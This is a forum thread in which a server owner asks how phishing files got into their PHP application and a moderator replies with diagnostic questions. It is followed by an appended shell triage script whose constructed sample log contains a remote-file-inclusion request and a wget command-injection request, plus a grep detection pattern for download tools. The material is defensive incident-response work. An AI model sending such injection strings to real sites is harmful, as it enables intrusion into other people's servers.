LinuxQuestions.org


dinakumar12 01-28-2012 05:41 AM

phishing attack on myserver
 
Hi all,

A PHP application on my server got a phishing attack. I found many new files inside that application folder.

I don't know how this hack happened. We don't have FTP access for that application.

Can anyone please explain to me how the hacker would have uploaded these files into my application?

And how do I get rid of this? At present I have stopped my application.

Your suggestions please.

eeekster 01-28-2012 06:23 AM

Quote:

Originally Posted by dinakumar12 (Post 4586624)
Can anyone please explain to me how the hacker would have uploaded these files into my application?

I don't think anybody can explain it without more information.

dinakumar12 01-28-2012 06:28 AM

Hi,

What information do I need to provide? I am ready to share.

unSpawn 01-28-2012 07:31 AM

Quote:

Originally Posted by eeekster (Post 4586647)
I don't think anybody can explain it without more information.

In this forum members post about problems that may or may not be security issues. These members are often new to Linux and may need more than the average amount of guidance. I ask you to reply not "just because you can" but only if you really want to help. Troubleshooting will be more efficient if you have (and will provide) a rudimentary understanding of Linux security and can anticipate the OPs questions.


Quote:

Originally Posted by dinakumar12 (Post 4586624)
A php application in my server got phishing attack.

Where is the server located (home, work, colocation)? Is it shared or a VPS? Is it yours (root access)?
What is the name of the application?
If it's not homebrew software, which version exactly?
Was it installed correctly? (No setup files left, proper access permissions)
Was it publicly accessible? (HTTPS vs HTTP, .htaccess or other access restrictions)


Quote:

Originally Posted by dinakumar12 (Post 4586624)
I found many new files inside that application folder.

Which files? (Post the list from running '/bin/ls --time-style=long-iso --quoting-style=c -altr /path/to/files;' as root.)
Do any of the web server's logs reference the files found, or show odd entries (often multiple lines) involving (output of) GET, curl, wget or other wget-like applications?
Do any of the web server's logs show other anomalies around the times the files were placed?


Quote:

Originally Posted by dinakumar12 (Post 4586624)
how to get rid of this. At present I have stopped my application.

If you cannot confirm the downloading is due to one specific application, it would be best to stop the web server for the duration of the investigation.
Please confirm no other problems have arisen before, during and after file placement. If unsure which steps to follow, please use this checklist:
Intruder Detection Checklist (CERT): http://web.archive.org/web/200801092...checklist.html
Please post back the results if any.

* Please stay with the thread (subscribe?) until completion and reply as soon as possible when replies are posted.
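A small triage script for two of the checks unSpawn asks for above (which files appeared after a known-good point, and which access-log entries involve wget/curl or a remote URL in a query string). This is an added example, not code from any post in this thread; the log lines, IP addresses (documentation ranges), paths and the throwaway document root are all constructed so it runs offline.

```shell
#!/bin/sh
# Added example, not from the thread: first-pass triage for a suspected web-app compromise.
# It answers two questions: which files were placed after a reference point, and which
# access-log entries involve wget/curl or carry a remote http/ftp URL in the query string.
# All data below is constructed; nothing here is taken from a real server.

# Constructed "combined" access log written to a temp file.
SAMPLE_LOG=$(mktemp)
cat > "$SAMPLE_LOG" <<'EOF'
203.0.113.5 - - [27/Jan/2012:22:14:03 -0500] "GET /app/index.php?page=http://198.51.100.7/x.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [27/Jan/2012:22:14:09 -0500] "GET /app/index.php?cmd=wget%20http://198.51.100.7/k.tgz HTTP/1.1" 200 88 "-" "Mozilla/5.0"
198.51.100.9 - - [27/Jan/2012:22:20:41 -0500] "POST /app/upload.php HTTP/1.1" 200 45 "-" "curl/7.21.0"
192.0.2.10 - - [27/Jan/2012:23:01:12 -0500] "GET /app/css/style.css HTTP/1.1" 200 2048 "http://example.com/app/" "Mozilla/5.0"
192.0.2.11 - - [28/Jan/2012:00:05:30 -0500] "GET /app/bank-login/index.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
EOF

# Constructed document root: two files from the original install (old mtimes),
# two dropped later (current mtimes). KNOWN_GOOD marks the last time the install was trusted.
DOCROOT=$(mktemp -d)
KNOWN_GOOD=$(mktemp)
trap 'rm -rf "$SAMPLE_LOG" "$DOCROOT" "$KNOWN_GOOD"' EXIT
mkdir -p "$DOCROOT/app/css" "$DOCROOT/app/bank-login"
printf 'original\n' > "$DOCROOT/app/index.php"
printf 'original\n' > "$DOCROOT/app/css/style.css"
touch -t 201112010900 "$DOCROOT/app/index.php" "$DOCROOT/app/css/style.css"
touch -t 201201272200 "$KNOWN_GOOD"
printf 'dropped\n' > "$DOCROOT/app/bank-login/index.html"
printf 'dropped\n' > "$DOCROOT/app/upload.php"

# Files under $1 modified after the reference file $2 (the 'ls -altr' check, made scriptable).
new_files_since() {
    find "$1" -type f -newer "$2" | sort
}

# Log lines whose request or user agent mentions wget/curl/libwww-perl, or whose query
# string carries a remote http/ftp URL (a typical remote-file-inclusion attempt).
# '|| true' keeps the function's exit status 0 when nothing matches.
suspicious_requests() {
    grep -Ei '(wget|curl|libwww-perl)|\?[^" ]*=(http|ftp)(%3a|:)' "$1" || true
}

suspicious_count() {
    suspicious_requests "$1" | wc -l | tr -d ' '
}

# Timestamp of the earliest suspicious request: the point to compare file mtimes against.
first_suspicious_time() {
    suspicious_requests "$1" | head -n 1 | sed -E 's/.*\[([^]]*)\].*/\1/'
}

# Source addresses that issued suspicious requests, deduplicated.
suspicious_sources() {
    suspicious_requests "$1" | cut -d' ' -f1 | sort -u
}

echo "Suspicious requests: $(suspicious_count "$SAMPLE_LOG"), first at $(first_suspicious_time "$SAMPLE_LOG")"
suspicious_requests "$SAMPLE_LOG"
echo "Sources:"
suspicious_sources "$SAMPLE_LOG"
echo "Files placed after the known-good point:"
new_files_since "$DOCROOT" "$KNOWN_GOOD"
```

On a real host you would point SAMPLE_LOG at the web server's access log and KNOWN_GOOD at a file whose mtime predates the incident (or use `touch -t` with the time from the first suspicious log line), then compare the two lists: files that appear only in the "placed after" list and have no legitimate deploy record are the ones to preserve for analysis before anything is cleaned up.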

